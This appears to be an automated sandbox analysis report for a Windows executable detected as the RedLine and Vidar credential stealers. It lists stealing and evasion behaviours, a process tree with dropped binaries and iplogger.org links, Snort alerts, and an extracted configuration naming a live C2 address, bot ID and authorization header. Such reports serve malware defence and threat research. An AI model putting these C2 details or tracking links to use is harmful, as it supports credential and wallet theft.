Windows
Analysis Report
60MLnq8Uma.exe
Overview
General Information
Detection
RedLine, Vidar
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Yara detected Generic Downloader
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- 60MLnq8Uma.exe (PID: 5156 cmdline: "C:\Users\user\Desktop\60MLnq8Uma.exe" MD5: FFBA715730CDB446FA832C8FCAA4F783)
- chrome.exe (PID: 1784 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://iplogger.org/1RyjC4 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 1560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1452,11475440189826178966,17567793588229146751,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 4432 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://iplogger.org/1A4aK4 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 1144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1568,7857115051154957405,2797733224038506213,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1848 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 5168 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://iplogger.org/1RLtX4 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 6300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1548,5130285983035601959,15719307342892292670,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1872 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 2924 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://iplogger.org/1RCgX4 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 4640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1516,8958814651368359877,1488781552778940000,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1868 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 2344 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://iplogger.org/1nfDK4 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 7284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,7594025643258788469,10261302925166173582,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1868 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 6764 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://iplogger.org/1AbtZ4 MD5: C139654B5C1438A95B321BB01AD63EF6)
- chrome.exe (PID: 7388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,6615225157792702950,16112084407947995520,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1968 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
- namdoitntn.exe (PID: 7164 cmdline: "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe" MD5: B16134159E66A72FB36D93BC703B4188)
- real.exe (PID: 5220 cmdline: "C:\Program Files (x86)\Company\NewProduct\real.exe" MD5: 84D016C5A9E810C2EF08767805A87589)
- safert44.exe (PID: 7456 cmdline: "C:\Program Files (x86)\Company\NewProduct\safert44.exe" MD5: DBE947674EA388B565AE135A09CC6638)
- kukurzka9000.exe (PID: 7540 cmdline: "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe" MD5: 5412966383390AAB13F3D06D8B942AB5)
- F0geI.exe (PID: 7664 cmdline: "C:\Program Files (x86)\Company\NewProduct\F0geI.exe" MD5: 8D24DA259CD54DB3EDE2745724DBEDAB)
- tag.exe (PID: 7692 cmdline: "C:\Program Files (x86)\Company\NewProduct\tag.exe" MD5: 2EBC22860C7D9D308C018F0FFB5116FF)
- EU1.exe (PID: 7720 cmdline: "C:\Program Files (x86)\Company\NewProduct\EU1.exe" MD5: 98EE616BBBDAE32BD744F31D48E46C72)
- cleanup
{"C2 url": ["62.204.41.144:14096"], "Bot Id": "@tag12312341", "Authorization Header": "71466795417275fac01979e57016e277"}
Rule | Description | Author |
---|---|---|
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
Rule | Description | Author |
---|---|---|
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
Windows_Trojan_RedLineStealer_3d9371fd | unknown | unknown |
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
Windows_Trojan_RedLineStealer_3d9371fd | unknown | unknown |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
Rule | Description | Author |
---|---|---|
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Windows_Trojan_RedLineStealer_3d9371fd | unknown | unknown |
Windows_Trojan_Vidar_114258d5 | unknown | unknown |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Rule | Description | Author |
---|---|---|
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
Windows_Trojan_RedLineStealer_3d9371fd | unknown | unknown |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
No Sigma rule has matched
Timestamp: | 08/05/22-14:34:23.916434 |
Source IP: | 192.168.2.4 |
Destination IP: | 62.204.41.144 |
SID: | 2850286 |
Source Port: | 49923 |
Destination Port: | 14096 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 08/05/22-14:34:25.840824 |
Source IP: | 192.168.2.4 |
Destination IP: | 45.95.11.158 |
SID: | 2036934 |
Source Port: | 49933 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 08/05/22-14:34:24.803289 |
Source IP: | 192.168.2.4 |
Destination IP: | 31.41.244.134 |
SID: | 2850286 |
Source Port: | 49916 |
Destination Port: | 11643 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 08/05/22-14:34:24.042900 |
Source IP: | 192.168.2.4 |
Destination IP: | 103.89.90.61 |
SID: | 2850286 |
Source Port: | 49846 |
Destination Port: | 18728 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 08/05/22-14:34:14.261317 |
Source IP: | 31.41.244.134 |
Destination IP: | 192.168.2.4 |
SID: | 2850353 |
Source Port: | 11643 |
Destination Port: | 49916 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 08/05/22-14:34:14.202307 |
Source IP: | 192.168.2.4 |
Destination IP: | 62.204.41.144 |
SID: | 2850027 |
Source Port: | 49923 |
Destination Port: | 14096 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 08/05/22-14:33:12.660021 |
Source IP: | 192.168.2.4 |
Destination IP: | 103.89.90.61 |
SID: | 2850027 |
Source Port: | 49846 |
Destination Port: | 18728 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 08/05/22-14:34:14.364490 |
Source IP: | 62.204.41.144 |
Destination IP: | 192.168.2.4 |
SID: | 2850353 |
Source Port: | 14096 |
Destination Port: | 49923 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 08/05/22-14:34:14.097038 |
Source IP: | 192.168.2.4 |
Destination IP: | 31.41.244.134 |
SID: | 2850027 |
Source Port: | 49916 |
Destination Port: | 11643 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 08/05/22-14:34:26.057532 |
Source IP: | 45.95.11.158 |
Destination IP: | 192.168.2.4 |
SID: | 2036955 |
Source Port: | 80 |
Destination Port: | 49933 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 08/05/22-14:33:28.712091 |
Source IP: | 103.89.90.61 |
Destination IP: | 192.168.2.4 |
SID: | 2850353 |
Source Port: | 18728 |
Destination Port: | 49846 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Virustotal: |
Source: | Avira URL Cloud: |
Source: | Virustotal: |
Source: | Avira: |
Source: | Metadefender: |
Source: | ReversingLabs: |
Source: | Metadefender: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Binary string: |
Source: | File opened: |
Networking |
---|
Source: | Snort IDS: |
Source: | File source: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | TCP traffic: |
Source: | Network traffic detected: |
Source: | HTTP traffic detected: |